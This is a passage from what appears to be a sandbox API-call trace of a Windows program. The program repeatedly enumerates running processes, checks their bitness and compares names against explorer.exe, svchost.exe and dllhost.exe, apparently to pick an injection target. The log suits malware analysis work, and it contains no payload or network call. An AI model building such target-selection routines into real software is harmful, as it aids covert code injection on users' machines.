hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0238.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0238.818] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.818] CloseHandle (hObject=0xd8) returned 1 [0238.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0238.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0238.818] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.818] CloseHandle (hObject=0xd8) returned 1 [0238.818] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0238.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0238.819] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.819] CloseHandle (hObject=0xd8) returned 1 [0238.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0238.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0238.819] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.819] CloseHandle (hObject=0xd8) returned 1 [0238.819] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0238.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0238.820] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.820] CloseHandle (hObject=0xd8) returned 1 [0238.820] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0238.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0238.821] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.821] CloseHandle (hObject=0xd8) returned 1 [0238.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0238.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0238.821] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.821] CloseHandle (hObject=0xd8) returned 1 [0238.821] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0238.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0238.822] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.822] CloseHandle (hObject=0xd8) returned 1 [0238.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0238.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0238.822] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.822] CloseHandle (hObject=0xd8) returned 1 [0238.822] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0238.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0238.823] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.823] CloseHandle (hObject=0xd8) returned 1 [0238.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0238.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0238.823] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.823] CloseHandle (hObject=0xd8) returned 1 [0238.823] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0238.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0238.824] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0238.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0238.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0238.825] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0238.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0238.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0238.826] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.826] CloseHandle (hObject=0xd8) returned 1 [0238.826] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0238.826] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0238.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0238.827] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.827] CloseHandle (hObject=0xd8) returned 1 [0238.827] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0238.827] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0238.827] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0238.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0238.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0238.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.828] CloseHandle (hObject=0xd8) returned 1 [0238.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0238.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.829] CloseHandle (hObject=0xd8) returned 1 [0238.829] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0238.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0238.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0238.830] CloseHandle (hObject=0xd8) returned 1 [0238.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0238.830] CloseHandle (hObject=0xd4) returned 1 [0238.830] Sleep (dwMilliseconds=0x3e8) [0239.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0239.868] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0239.869] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0239.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0239.869] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0239.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0239.870] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0239.870] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0239.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0239.871] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0239.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0239.871] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0239.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0239.872] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0239.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0239.872] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0239.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0239.873] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0239.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0239.873] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0239.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0239.874] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0239.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0239.875] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0239.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0239.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0239.876] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0239.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0239.877] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0239.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0239.878] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.878] CloseHandle (hObject=0xd8) returned 1 [0239.878] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0239.878] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0239.878] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0239.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0239.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0239.878] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0239.879] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.879] CloseHandle (hObject=0xd8) returned 1 [0239.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0239.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0239.879] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0239.879] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0239.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0239.880] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0239.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0239.881] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.881] CloseHandle (hObject=0xd8) returned 1 [0239.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0239.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0239.881] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.881] CloseHandle (hObject=0xd8) returned 1 [0239.881] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0239.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0239.882] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.882] CloseHandle (hObject=0xd8) returned 1 [0239.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0239.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0239.882] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.882] CloseHandle (hObject=0xd8) returned 1 [0239.882] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0239.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0239.883] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.883] CloseHandle (hObject=0xd8) returned 1 [0239.883] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0239.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0239.884] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0239.884] CloseHandle (hObject=0xd8) returned 1 